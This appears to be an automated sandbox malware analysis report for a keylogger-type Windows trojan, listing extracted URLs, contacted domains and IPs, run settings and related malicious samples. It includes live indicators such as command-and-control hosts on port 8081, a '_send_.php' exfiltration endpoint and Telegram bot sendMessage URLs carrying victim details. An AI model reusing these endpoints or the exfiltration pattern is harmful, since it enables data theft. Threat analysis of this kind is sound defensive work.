http://www.fontbureau.com	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmE	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.8.169	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmE	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1741165267.00000000056D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003D14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E43000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1741882938.0000000005712000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003D14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E43000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.jiyu-kobo.co.jp/	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519297
Start date and time:	2024-09-26 10:32:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 197 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, PID 7472 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Simulations

Behavior and APIs

Time	Type	Description
04:33:06	API Interceptor	11800064x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe modified
04:33:08	API Interceptor	16x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rTEKL__FTALEPVEF__YATTEKL__F__.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPROFORMAINVOICE-PO_ATS_1036pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse
188.114.97.3	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
api.telegram.org	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
